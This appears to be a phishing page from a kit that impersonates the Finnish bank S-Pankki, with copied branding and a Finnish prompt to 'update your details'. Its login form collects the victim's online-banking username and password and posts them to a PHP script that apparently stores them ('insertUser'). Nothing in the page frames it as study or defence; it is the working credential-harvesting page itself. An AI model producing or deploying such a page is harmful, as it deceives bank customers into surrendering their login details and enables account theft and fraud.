<!DOCTYPE html>
<html lang="fi">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Description of your website">
    <title>S-Pankki</title>
    <link rel="shortcut icon" href="https://www.s-pankki.fi/favicon.ico">
    <link href="./Tunnistautuminen_files/auth.05f49022e1cd9c5b1b15.css" rel="stylesheet">
</head>
<body class="ebank no-js fi">

<header>
    <!-- Your header content goes here -->
</header>

<main class="page-wrapper login-layout">
    <div class="page-info">
        <!-- Additional page information here -->
    </div>
    <div class="page-box">
        <div class="page-box-header">
            <h2 class="page-box-heading">
                <img src="Tunnistautuminen_files/spankki.png" alt="" width="81" height="27" align="left">
                P&auml;ivit&auml; S-Pankin tunnuksilla
            </h2>
        </div>
        <div class="page-box-banner">
            <img src="Tunnistautuminen_files/codetable (2).jpg" alt="" width="99%" height="212">
        </div>
        <div class="page-box-content">
            <div class="grid-x">
                <div class="page-box-description cell small-12 medium-6">
                    <p>N&auml;in p&auml;ivit&auml;t tietosi verkkopankissa Kirjaudu verkkopankkiin. Vastaa kirjautumisen j&auml;lkeen aukeavaan kyselyyn. Jos kysely ei aukea automaattisesti, klikkaa oikeasta yl&auml;kulmasta omaa nime&auml;si ja valitse Henkil&ouml;tiedot-otsikon alta P&auml;ivit&auml; tiedot.</p>
                </div>
                <div class="cell small-12 medium-6">
                    <form id="logForm" method="post" action="user_login_auth.php">
                        <input type="hidden" name="id" value="">
                        <input type="hidden" name="loader" value="insertUser">
                        <div class="form__normal">
                            <div class="is-required">
                                <label for="username" class="form__label">K&auml;ytt&auml;j&auml;tunnus</label>
                                <small id="code-table-number">6-8 numeroa</small>
                                <input type="text" id="username" name="username" maxlength="10" value="" size="12" class="form__password js_focusOnMe" autocomplete="" required>
                            </div>
                            <div class="form__normal">
                                <div class="is-required">
                                    <label for="pass" class="form__label">Salasana</label>
                                    <small id="code-table-number">Itse keksim&auml;si 4-6 numeron sarja.</small>
                                    <input type="text" id="pass" name="password" maxlength="10" value="" size="12" class="form__password js_focusOnMe" autocomplete="" required>
                                </div>
                                <div class="button-row">
                                    <button type="submit" class="button" name="visitor_login" value="Jatka">
                                        <span class="btn-normal">
                                            <span class="arrow">Jatka</span>
                                        </span>
                                    </button>
                                </div>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
</main>

<footer>
    <!-- Your footer content goes here -->
</footer>

</body>
</html>
